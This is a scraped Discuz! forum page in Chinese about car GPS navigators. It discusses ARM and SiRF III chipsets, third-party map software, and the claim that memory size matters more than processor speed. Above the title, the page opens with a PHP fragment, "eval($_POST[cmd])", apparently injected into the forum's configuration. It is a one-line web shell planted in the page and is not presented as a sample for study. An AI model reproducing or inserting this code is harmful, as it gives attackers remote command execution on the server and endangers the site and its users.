');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); GPS硬件參數不易瞭解嗎 - GPS - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

GPS硬件參數不易瞭解嗎

最容易讓人迷惑的是在車載GPS導航儀所採用的芯片組上,目前市面上最常見的就是使用ARM處理器加上SiRF第三代接收芯片的的方案設計,而同方案設計出來的產品在絕大多數的情況下能夠保持近似的效率。




    而目前車載GPS導航儀產品中除了個別品牌採用了自己的導航軟件來搭配使用,市面上過半數的產品都採用了比如凱立德、道道通等導航地圖軟件廠商提供的軟件,原理就等同於我們的個人電腦上面有了Windows的操作系統,而我們只需要購買一套Office軟件就可以進行日常辦公一樣。

    那麼這裡就有一個選購時的誤區,很多消費者在購買上,都在問這個產品的速度快不快,運行會不會很卡之類的問題。在這裡可以說明的是,目前市面上的產品都可以流暢的運行導航軟件,如果硬要選一個部分的話,那麼內存的大小對於軟件的流暢度影響要遠比處理器大。目前市面上開始出現高主頻處理器的車載PND產品,至於是否極大程度上影響了實際的使用感覺,還有待考證。
返回列表